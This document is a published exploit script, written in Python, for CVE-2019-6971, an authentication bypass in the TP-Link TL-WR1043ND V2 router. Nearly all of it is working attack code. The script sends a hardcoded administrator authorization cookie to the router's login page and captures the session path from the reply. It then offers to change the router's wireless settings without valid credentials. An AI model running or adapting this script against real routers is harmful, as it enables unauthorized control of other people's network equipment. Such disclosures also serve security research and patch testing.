Share
# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass  
# Date: 2019-06-20  
# Exploit Author: Uriel Kosayev  
# Vendor Homepage: https://www.tp-link.com  
# Version: TL-WR1043ND V2  
# Tested on: TL-WR1043ND V2  
# CVE : CVE-2019-6971  
# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971  
  
import requests  
  
ascii = '''  
__________ __ _ __   
/_ __/ __ \ / / (_)___ / /__  
/ / / /_/ /_____/ / / / __ \/ //_/  
/ / / ____/_____/ /___/ / / / / ,<   
/_/ /_/ /_____/_/_/ /_/_/|_|   
  
'''  
print(ascii)  
Default_Gateway = raw_input("Enter your TP-Link router IP: ")  
  
# Constants  
url = 'http://'  
url2 = '/userRpm/LoginRpm.htm?Save=Save'  
full = url + Default_Gateway + url2  
# full = str(full)  
  
# The full GET request with the cookie authorization hijacked  
req_header = {  
'Host': '{}'.format(Default_Gateway),  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',  
'Accept-Language': 'en-US,en;q=0.5',  
'Accept-Encoding': 'gzip, deflate',  
'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),  
'Connection': 'close',  
'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',  
'Upgrade-Insecure-Requests': '1'  
}  
  
try:  
response = requests.get(full, headers=req_header).content  
except requests.exceptions.ConnectionError:  
print("Enter a valid Default Gateway IP address\nExiting...")  
exit()  
generate = response.split('/')[3] # Gets the randomized URL "session ID"  
  
  
option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")  
  
if option_1 is 1:  
  
if generate in response:  
print('Vulnerable!\n')  
option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')  
if option_2 is 2:  
newssid = raw_input('New name: ')  
ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(  
newssid)  
changessid_full = url + Default_Gateway + '/' + generate + ssid_url  
requests.get(changessid_full, headers=req_header)  
print('Changed to: {}'.format(newssid))  
else:  
("Please choose the correct option.\nExiting...")  
exit()  
else:  
print('Not Vulnerable')  
exit()  
else:  
print("Please choose the correct option.\nExiting...")  
exit()